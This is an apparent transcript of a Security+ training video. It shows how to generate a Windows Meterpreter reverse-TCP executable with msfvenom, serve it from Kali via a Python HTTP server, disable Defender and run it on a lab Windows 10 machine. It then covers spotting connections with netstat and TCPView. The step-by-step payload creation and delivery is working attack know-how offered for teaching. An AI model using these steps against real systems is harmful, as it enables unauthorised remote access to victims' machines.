Hello and welcome to the section 2 of the course Threats, Attacks and Vulnerabilities for CompTIA Security Plus. Now in this section we are going to take a look at various points. We are going to determine the security of a system. We will learn about various cybersecurity attacks, threats and attributes, various pen testing concepts, various vulnerability types and impact of vulnerabilities. So let's start with determine malware and security in action. Now in this video we are going to take a look at couple of points. First of all, we will learn about the malware attack inside network, and then we will learn that how you can secure your system from these kind of malware attacks. So now what I'm going to do here, I'm going to show you that how you can create a basic virus or basic malware using Kali Linux operating system, and then how you can infect your Windows operating system with that malware. And then later in the video I'm going to show you that how you can secure your Windows network or Windows machine using various softwares. So guys, now what you can do here, you can open your Kali Linux and Windows machine inside your VMware workstation, and then I'm going to show you that how you can create a malware. So guys, I'm here at Kali Linux operating system, and first of all let me log in inside it. Here it is. So we are here at Kali Linux, and we also have Windows 10 machine in VMware workstation, right? So now what you can do here, you can open first of all the terminal of Kali Linux, and then let me provide you the command so that you can create a basic virus inside Kali Linux. You can also take help of various frameworks available inside Linux, but let me provide you the basic command. So first of all, on the left hand side, this is the terminal. So click here and open it. Here it is. Now let me take help of msfvenom command. And using msfvenom command, I can create a simple virus or malware for Windows machine, for Windows 10 machine, and then we will send that malware inside Windows later. So let me type the command first of all. The command is msfvenom. First of all, let me type, then I will explain you. -p Windows /meterpreter /reverse_tcp -a x86, then lhost equals to, so lhost is your local IP address or Kali Linux IP address. So you can check your Kali Linux IP address. So let me click on file, let me click on new tab, and here I can type ifconfig, check my Kali Linux IP address. So here it is, 192.168.136.128, working on ETS0. Right click and copy it. Right, now you can close it and you can paste here. So this is the IP address of Kali Linux operating system. Then lhost is basically the port number. You can take any port number like 5555, 7777, basically any unused port inside your system. So for example, let me take the port number 7777. All right, then -f exe, and then where I want to save it. So I want to save it inside my root folder with the name virus.exe. All right. So msfvenom -p windows /meterpreter /reverse_tcp -a x86 lhost equal to your Kali IP address. Basically that is L port, not lhost. Let me edit it. This is L port equal to 7777 -f exe, and then the name of the file. So msfvenom is the command. So this is the command. -p is basically the payload, and this is the payload name. Windows /meterpreter /reverse_tcp is the payload name. -a stands for architecture of the target machine, so x86. lhost, as I already told you, that this is a local IP address or Kali Linux IP address, and L port is your local port. So I'm taking 7777. You can take 5555. -f file type, exe, what kind of file you want, because as our target machine is Windows, so that's why I'm creating an exe file, and this sign and the file name, where you want to save the file. So I want to save it inside root folder. That's why the name of that file is virus.exe. All right. Now what you can do here, you can simply hit enter, then it will create that virus inside the root folder of Kali Linux, and then we will transfer that virus inside Windows machine. Then we will infect it, and then we will learn that what are the various tools or softwares available which can be used to find out these kind of malwares and how to secure your system. Now you can hit enter, and now it is in process. Soon it will provide you information, so you just need to wait here. And here you can see that it is showing you that no platform was selected, choosing MSF platform Windows from the payload. So you can again check your command is fine or not. So MSF venom-p windows/meterpreter/reverse_TCP, architecture, lhost, lport, file type, and then name. No encoder, we have not set any encoder here. See 41 bytes of size of payload, and this is the final size of exe file, 73,802 bytes, right? Now where it is inside your root folder with the name virus.exe, right? So let me check if it is inside root folder or not. So what you can do here, you can simply type ls here and hit enter, and here you can see that the file is available here, virus.exe file. You can also check like this. Let me minimize it, and now you can click on places, then you can click on home, and here it is. So you can see here that virus.exe file is available here. So we have successfully created a malware. Malware is basically a virus or Trojan or a worm. Basically it is a kind of a group of these kind of entities. Now as we have created, now next thing is we need to send this virus to the basically Windows machine or the target machine, and then we have to infect it. So guys, now the thing is how you can transfer this virus from here to the Windows machine. What is the procedure? So there are many procedures. You can basically take it in basically external drive, and then you can provide it to that system. Otherwise you can also create a server inside Kali Linux, and using that server you can transfer this virus.exe to Windows machine. So let me use the second option, which is to create a server inside Kali Linux operating system, and then we can send this virus to Windows machine. So I'm using a server which is based on Python. So using Python server, I'm going to transfer it. Let's try it. So you can right click here, open the terminal, and let me start the Python server inside Kali Linux. So start the Python server, you can type here python-m, then simple http server. This is the code to start Python server inside Kali Linux machine. Hit enter, and here you can see that it is working on the port number 8000 inside Kali Linux. So now Kali Linux machine is working as a server, right? And now we can access the whole directory of Kali Linux inside Windows machine. So now what you can do here, you can go back to the Windows machine, and then you can open the browser, and then I'm going to show you that how you can download that virus inside Windows machine. So guys, as you can see here that I'm inside Windows machine, and we have successfully created a virus inside Kali Linux machine. Now it's time to transfer that virus from Kali to Windows machine. So we have created a server, and using that server we are going to transfer that virus. So what you need to do here, you need to check the IP address of Kali Linux first of all, right? And you can see here that we have started a browser inside Windows machine. So I'm going to type the IP address of Kali Linux colon the port number of Python in the browser of Windows to access the directories of Kali Linux operating system. So before that, what you can do here, you can basically disable all the security mechanisms inside Windows, because you know that we have created a basic virus and we have not used any encoding techniques so that we can hide that virus from antiviruses or anti-malware, right? So that's why for a basic demo, you can simply disable your security mechanism. So I don't have antivirus inside my system, but I think Defender is working. So let me disable the Defender first. So now let me search for Defender here. Click on Windows Defender settings. And as you know, we are working on Windows 10 machine. So click on Virus and Threat Protection. Click on Virus and Threat Protection settings. And here you can see that it is enabled. So basically, just for information, let's disable, because we are not using any encoding techniques. That's why. So here it is. Click yes. And here it is. So real-time protection is off. Now security mechanism will not detect the virus. So let me go back to Kali Linux and let me check the IP address of Kali Linux here. So let me open Kali Linux. and let's open a new window, and here you can type ifconfig. So the IP address is 192.168.136.128. Let me minimize it. Let me open the browser of Windows machine, and here I'm going to type the IP address of Kali Linux, 192.168.136.128. Let's check. It is 136.128, so that is fine. Colon the port number used by Python. So you can see inside Kali Linux that here it is using the port number 8000, right? So we can also use the same port number, 8000, and hit enter. And here you can see. So you can see here that I'm able to access the directories of Kali Linux inside Windows machine. So now the simple thing is basically you just need to download that virus inside your Windows machine, and then you can simply execute that exe file inside your Windows, and that's it. So here you can see that virus.exe file is available here. Let me click here. It is around 72 KB file, that's correct. Click save file, and here it is. So you can see here that we have successfully downloaded virus.exe file inside Windows machine, and now we can simply click and execute this file inside Windows 10 machine so that we can make a connection with Kali Linux machine. So let me click here and let me run this file inside Windows machine. So click run. So now that file is running inside Windows machine, and Windows is infected with that kind of virus. So guys, now we are learning that how you can secure your network, how you can check if other machines are connected to your system or not, right? So that was a simple demo to show you that how you can create a basic malware and how attackers actually create malwares using Kali Linux, and then how they infect the target machine, right? Now let's take another point, that how you can check the connections inside your Windows machine. And if you want to check the processes running inside your Windows, if you want to check the IP address connected with your machine, so you can easily check inside Windows. Let me provide you two options here. One is using command prompt, second is using tool. So first of all, let me provide you information using your command prompt. So what you can do here, you can open a command prompt inside Windows. So let me open a command prompt, cmd, hit enter, here it is. So there is a simple tool available inside command prompt which is called netstate, and using netstate you can check the connections from your system to other systems. So that can be done using netstate. The command is netstate space dash small a, and that can provide you all the connections. Let me show you. So here you can type netstate dash small a and hit enter, and here you can check all the connections are available here. You can see here this is the local address, and after colon this is the port number, right? And this is the foreign address. So you can see here that these machines are connected with us. Here you can see. So this is your local address of your system. This is the foreign address, means the other machine which is connected with your machine. And this is the basic information about state, that the connection is listening or the connection is already established, or time wait conditions are available. So that can be checked using these basically commands. So this is the basic command netstate dash small a, and after that you can see the active connections are available. So these all are the active connections. Got it? So that's how you can check the connections, and that can be done using command prompt. So let me give you another option with a simple tool. So let me close it. Let me open Google, and there is a tool available which is called Tcp View, and using Tcp View we can also check the connections. So you can type here download Tcp View and hit enter. So here it is, the window tool available from Microsoft. So click here and open it. So this is from Microsoft, so it is a reliable tool. Here it is, download Tcp View. Click here. Let me open it. Here it is. So you can simply click on tcp.exe file, double click here, and here it is. So you can see here that this can also provide you information about your current connections. So if attacker is connected with your machine, if basically the connection is established, then basically you will check all these values available here. You can see here, thus that, for example, VMware.exe is connected with here, PID 838, process ID, state established. This is your current desktop, and remote localhost, right? So all the connections can be checked using TCP View, or you can also use netstat. So that can be done easily. So because when you will check the connections, so if the attacker is connected with your machine, so it will also provide you the IP address of the attacker machine or the port number it is used by attacker. So that can be easily checked using TCP View and netstat. So that's how you can secure your network. That's how you can secure your system using these small software or tools.